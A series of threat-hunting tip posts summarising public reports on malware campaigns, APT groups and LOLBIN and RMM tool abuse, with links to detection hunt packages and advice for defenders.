If RMM tool abuse is something you are concerned about check out this community hunt package! This hunt package is designed to identify when a service is created to run AnyDesk, which was a tactic the adversary used in this report! Hope you enjoy and Happy Hunting!
AnyDesk Service Installation - Potentially Malicious RMM Tool Installation
https://hunter.cyborgsecurity.io/research/hunt-package/4103B086-F093-4084-9125-15B9A6C872B8
I know I was away for a while but I'll make it up to you! Check out our Hunt Package Collection that focuses on Volt Typhoon! We have multiple community edition hunt packages that can get you started! Now, the next steps are up to you! Happy Hunting!
AND A HUNT OF THE DAY!?! You know it! Looking at where the malware created their scheduled task you can tell it is a little phishy, but there are more locations that adversaries like to use/abuse! See what you can find in your environment with this! Yes, it is community and I hope it gets you off on your journey if you haven't started OR it adds another tool to your existing toolbox! Happy Hunting!
Scheduled Task Executing from Abnormal Location
https://hunter.cyborgsecurity.io/research/hunt-package/09a380b3-45e5-408c-b14c-3787fa48d783
To compliment the work of the authors, why not take this Community Hunt Package with you to identify when a Powershell encoded command is executed in your environment:
Powershell Encoded Command Execution
https://hunter.cyborgsecurity.io/research/hunt-package/d2d3bbc2-6e57-4043-ab24-988a6a6c88db
I had this all ready but forgot to send yesterday! For your #huntoftheday I would recommend conducting an unstructured hunt on processes making network detections that could lead to C2 activity! Enjoy and Happy Hunting!
And, if you are taking this wonderful intel and using it to threat hunt, why not let us help you! Check out this Community Hunt Package that helps identify when AnyDesk is executed from an abnormal folder. Yes it wasn't mentioned in the article, but there are PLENTY of examples of this abuse in many other articles! Enjoy and Happy Hunting!
AnyDesk Execution from Abnormal Folder - Potential Malicious Use of RMM Tool
https://hunter.cyborgsecurity.io/research/hunt-package/93F71607-F35D-4AA6-AEC9-C2F8A62CBD8A
Don't think I was going to leave you hanging! If you haven't got this hunt package yet, what are you waiting for? This is probably the top community hunt package I post because the technique is SO common! Let us help you hunt for persistence through the modification of the Windows Run Registry key and other locations. I promise, the NanoCore RAT is not the only malware to use it, so you got multiple threats covers. Enjoy and Happy Hunting!
Autorun or ASEP Registry Key Modification
https://hunter.cyborgsecurity.io/research/hunt-package/8289e2ad-bc74-4ae3-bfaa-cdeb4335135c
And more good news! I am going to leave you with a community hunt package from our Ransomware Collection for you to stay diligent in your threat hunting efforts! So go get hunting!
Windows sc Used to Disable Multiple Services in Brief Period - Potential Ransomware
https://hunter.cyborgsecurity.io/research/hunt-package/5387a0d8-7890-4338-b1d5-8611dbfdcfee
And as a gift for you on Friday, here are TWO community hunt packages you can use to hunt for similar suspicious activity! Happy Hunting!
Scheduled Task Executing from Abnormal Location
https://hunter.cyborgsecurity.io/research/hunt-package/09a380b3-45e5-408c-b14c-3787fa48d783
This hunt package is designed to capture activity associated with a scheduled task which includes abnormal locations in its details for execution. This is often a mark of persistence or malicious tasks created by malware or attackers. details.
Potential Maldoc Execution Chain Observed
https://hunter.cyborgsecurity.io/research/hunt-package/b194088b-c846-4c72-a4b7-933627878db4
Detect the aftermath of a successfully delivered and executed maldoc (Microsoft Office). A detection indicates an Office document was opened from an email or download/link, spawned a suspicious execution, and attempted to execute code via common Windows binaries (i.e. powershell, cmd, rundll32, etc).
Good day everyone!
Sophos has released their second "Active Adversary Report" of 2024 where they look specifically at patterns and developments they noted during the first half of the year. They provided 3 key takeaways which were:
- Abuse of built-in Microsoft services (LOLbins) is up - way up
- RDP (Remote Desktop Protocol) abuse continues rampant, with a twist
- The ransomware scene: Banyans vs poplars.
LOLBIN abuse:
The Sophos researchers organized all their data and found that RPD, cmd.exe, and powershell were the top hitters for most prevalent LOLBIN being abused and they share the trend of LOLBIN abuse of which applications are being seen more or less from 2023 compared to the first part of 2024. Notable increases were seen in cmd.exe, net.exe, notepad.exe and ipconfig.exe. Notable decreases were PsExec, Task Scheduler, and a slight decrease in RDP, even though it remains at the top.
Now the question is, how does this help you and what are you going to do about it? Well, there is always the question as to whether to run a structured or unstructured hunt. For unstructured, I would prioritize that list from first to last and look for anomalies in the data. For structured hunts, I would try to better understand the behavior and the reason the adversaries are using them. Then you can focus on these behaviors, improve your query using different options/flags/parameters (whatever you want to call them) and dig deeper. Use the knowledge you have of how they have been used maliciously in the past to help guide you! Enjoy and Happy Hunting!
The Bite from Inside: The Sophos Active Adversary Report
https://news.sophos.com/en-us/2024/12/12/active-adversary-report-2024-12/
Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday #huntoftheday #gethunting Cyborg Security, Now Part of Intel 471
Happy Monday everyone!
Kaspersky researchers discovered the #RedLineStealer being spread through a well-known HPDxLIB activator when adversaries published links directing unknown victims to malicious version of the software. The malicious software involved a malicious DLL getting loaded by "1cv8.exe" which would load another malicious library which would launch the stealer.
Looking at a report that was published earlier this year, McAfee researchers detailed some of the behaviors that are attributed to the RedLine Stealer. There was a creation of a "readme.txt" file in a C:\Program Files\ directory (most likely the directory of the malicious version of the legitimate software that was downloaded), there was a scheduled task created that referenced the "readme.txt", and a .cmd file that was created in the C:\Windows\Setup\Scripts\ directory that started a randomly named executable that once again, referenced the readme.txt file.
If I were hunting for this, I would start with scheduled tasks being created in my environment that may not match the naming convention established by my business. Enjoy the read and go get hunting! Happy Hunting!
RedLine info-stealer campaign targets Russian businesses through pirated corporate software
https://securityaffairs.com/171771/cyber-crime/redline-info-stealer-campaign-targets-russian-businesses.html
(You can find the original report in the link provided by this Security Affairs article.)
Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday #huntoftheday #gethunting Cyborg Security, Now Part of Intel 471
Happy Monday everyone, it is hard to believe it is December already!
Researchers at ANY.RUN - Interactive Malware Analysis Service found an interesting technique used by adversaries to trick their victims into compromising themselves using corrupted Word documents. The attackers send corrupted Word documents that bypass security software due to their damaged state but are still recoverable by the applications. Once the target recovers it, they are presented with a QR code to scan that is paired with the logo of a legitimate organization to make it look more legitimate. The target or potential victim is then taken to a phishing site that masquerades as a Microsoft login page in order to steal the legitimate credentials.
Looking at potential hunting opportunities it may be a little harder to find than most "macro enabled document" situations because the goal appears to have the user use a different device scan the QR code and enter their credentials. In that case, if there is any reports of corrupted documents finding their way to users emails, I would begin a hunt for abnormal login attempts! Enjoy and Happy Hunting!
Any.Run Twitter source:
https://x.com/anyrun_app/status/1861024527779541304
Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday #huntoftheday #gethunting CyborgSecInc
Happy Wednesday everyone!
While researching the #BlackBasta ransomware, I came across a couple great articles (not that all of them aren't great, I just haven't read ALL of them).
The first is from RedSense, a threat intelligence org that takes a deep dive into "The Evolution of BlackBasta Malware Dissemination" where they look at BlackBasta activity from 2022 up to today. They provide historic examples of what led up to this point but also provide wonderful technical details on malware and behaviors. In 2024 they were seen exploiting Microsoft Teams vulnerabilities and how they tricked victims to download RMM tools like AnyDesk to gain access to their machine and network.
One behavior that may indicate that you are a victim of ANY ransomware, but one attributed to BlackBasta, is suspicious BCDEdit.exe activity. BCDEdit is a command-line tool for managing Boot Configuration Data, or BCD, and the ransomware modifies the configuration to prevent recovery.
This is a great article and I hope you get as much out of it as I did! Happy Hunting!
The Evolution of BlackBasta Malware Dissemination
https://redsense.com/publications/evolution-of-blackbasta-malware-dissemination/
Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday #huntoftheday #gethunting Cyborg Security, Now Part of Intel 471
Good day everyone!
A Chinese APT group, hashtag#EarthEstries, makes headlines today in an article from Trend Micro researchers. Earth Estries has been targeting critical sectors like telecommunications and government entities across the US, Asia-Pacific, Middle East, and South Africa 2023, so they have a significant global footprint. They like to target public-facing server vulnerabilities for initial access, abuse living-off-the-land binaries (LOLBINs) for lateral movement, deploy backdoors such as GHOSTSPIDER, SNAPPYBEE, and MASOL RAT, and use advanced techniques.
In this report, you can see the commands that were issued for lateral movement through WMIC.exe, discovery activity using ping.exe to output to a file (most likely for ready by the adversary later), more discovery activity using wevtutil.exe looking at event code 4624 (Process Create) and then the PSEXEC.exe activity that first accepted the end user license agreement ("accepteula"), and finally the execution of a bat file.
You are probably thinking, well, where do I start hunting for this activity? A quick win that I can share with you is looking for that first execution of a Sysinternals tool, which modifies a registry key when the "acceptula" parameter is issued.
Now enjoy the rest of the article that I omitted and go get hunting! Happy Hunting!
Game of Emperor: Unveiling Long Term Earth Estries Cyber Intrusions
https://www.trendmicro.com/en_us/research/24/k/earth-estries.html
Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday #huntoftheday #gethunting Cyborg Security
Happy Friday everyone!
A Joint Advisory from the National Security Agency, Federal Bureau of Investigation (FBI), Cyber National Mission Force, and the National Cyber Security Centre provides updates on the Russian Federation's Foreign Intelligence Service, or #SVR.
According to the advisory, #APT29 (a.k.a Midnight Blizzard, Cozy Bear, and the Dukes) has targeted the defense, technology, and finance sectors to collect foreign intelligence and enable future cyber operations. They aim to exploit software vulnerabilities for initial access and escalate privileges. They also utilize spearphishing campaigns, password spraying, abuse of supply chain and trusted relationships. They also utilize custom malware and living-off-the-land (LOLBINs) techniques for multiple techniques.
The report includes a list of #CVEs that APT29 has been observed exploiting and attach the vendor and product that are effected with details that describe the vulnerability along with a section of mitigations that your organization can take to increase your security posture.
If you are looking for behaviors that are attributed to APT29, look no further than the MITRE ATT&CK Matrix! This resource has collected historic #TTPs and behaviors and referenced them as well. So while you are working on hardening your environment you can also hunt for their activity as well! Enjoy and Happy Hunting!
Article Source:
Update on SVR Cyber Operations and Vulnerability Exploitation
https://www.ic3.gov/Media/News/2024/241010.pdf
Mitre source:
https://attack.mitre.org/groups/G0016/
Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday #huntoftheday #gethunting Cyborg Security, Now Part of Intel 471
Thank you all for awaiting patiently for your Threat Hunt Tip of the Day! And here you go!
I am not going to touch on the Windows Registry Run key that was mentioned, I lost track of how many times I shared that hunt package, even though it still proves to be useful, but what I will talk about are RMM tools. This list consists of tools like AnyDesk (seen in the Microsoft article), TeamViewer, AteraAgent, and many more!
How do you approach this? Hopefully you have an inventory and hopefully you have an application allow-list. If you have both of these, its a great start, but if you are like some organizations and living in the wild-west, it might be tougher. I would simply create a list of all the RMMs out there that have been abused by threat actors and search for them in your environment. Compare that to the software inventory if you have it and compare that to the application allow-list (if you have that as well) and then see what your data is telling you. This could be a quick win, especially if you see AnyDesk floating around your environment but no one approved it! Well, what are you waiting for? Go get those items and get hunting! Happy Hunting!
Nice little resource for RMMs from Red Canary!
https://redcanary.com/threat-detection-report/trends/rmm-tools/
Cyborg Security Intel 471 #CyberSecurity #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #gethunting #huntoftheday
For your Threat Hunting Tip of the Day:
Masquerading is a common technique used by attackers and by using legitimate names for their malicious programs it makes the victims more likely to click the application. But, as a hunter, what can you do? Easy: Look at the process chain!
Part of Threat Hunting is learning your environment and by identifying process chains that are legitimate in your environment, you can start to look for process chains that may not make sense. So when you are looking at "legit" sounding apps that are executing, make sure you look at the parent process!
Good luck and Happy Hunting!
Cyborg Security Intel 471 #CyberSecurity #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #huntoftheday #gethunting!
For your threat hunting tip of the day:
Once the malware was downloaded it started reaching out to some non-standard ports. Not only did the ports stick out as odd but the executables or programs doing it seemed strange as well. One example is the MSBuild.exe (an executable masquerading as a legitimate process) connected to an IP over port 6000.
Using speedguide.net as a reference to see what legitimate programs use port 6000, I see Medal of Honor Rising Sun, Madden NFL 2005, Army of Two for the PlayStation 3, and other games. BUT, if we look at the first part of the table we see that it has been used by different trojans. So the question you should ask yourself is this: Is someone playing PlayStation in my corporate environment, and an old one at that, or is this strange port something I should look into?
So, look for non-standard ports that aren't tied to business or legitimate processes and do some research to see what they possibly could be! I hope this helps! Enjoy and Happy Hunting!
@cyborg Security @Intel 471 #CyberSecurity #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #huntoftheday #gethunting
Here is your Threat Hunting Tip of the Day:
In the The DFIR Report the attackers abused #PowerShell to execute encoded commands to hide their true activity from the defenders or the victims. Normally, PowerShell needs a parameter that tells it that the following command will be encoded, which is any valid variation of the "-encodedcommand" parameter. Now, this ranges from -e to -EnCoDeDcOmMaNd and everything in between to INCLUDE escape characters! So what are defenders to do?
You could leverage this Intel 471 Free Community Hunt Package that looks for these variations using regular expression! Now, this will help you identify the encoded commands that are run in your organization and possibly by attackers, but be warned! False-positives are a thing and once you start removing them you should have a better idea of what is abnormal. You can also use open source tools like CyberChef to decode the commands so you can make them human readable!
I hope this gets you started on your Threat Hunting journey, good luck and Happy Hunting!
Powershell Encoded Command Execution
https://hunter.cyborgsecurity.io/research/hunt-package/d2d3bbc2-6e57-4043-ab24-988a6a6c88db
Cyborg Security #CyberSecurity #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #huntoftheday #gethunting
Threat Hunting Tip of the Day:
I know I normally steer you to a Cyborg Security and Intel 471 Hunt package but something about this report stuck out that could be an issue in many organizations and that can be summed up to one word: visibility!
Under the "Data Access and Impact (TA0010 and TA0040) section, it states that "CloudTrail S3 data logging and S3 server access logging was not enabled...no logs existed that showed exfiltration activity from the S3 buckets." [1]
Lesson learned: IF you are migrating to the cloud or bringing new hardware/software, assets, etc into your environment, please take time to assess what level of logging exists, and determine what is valuable to ingest. Taking that time will be worth it in the long run and allow your analysts to dig through logs, create detections, and threat hunt in your environment! Enjoy and Happy Hunting!
[1] https://unit42.paloaltonetworks.com/shinyhunters-ransomware-extortion/
#CyberSecurity #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #gethunting
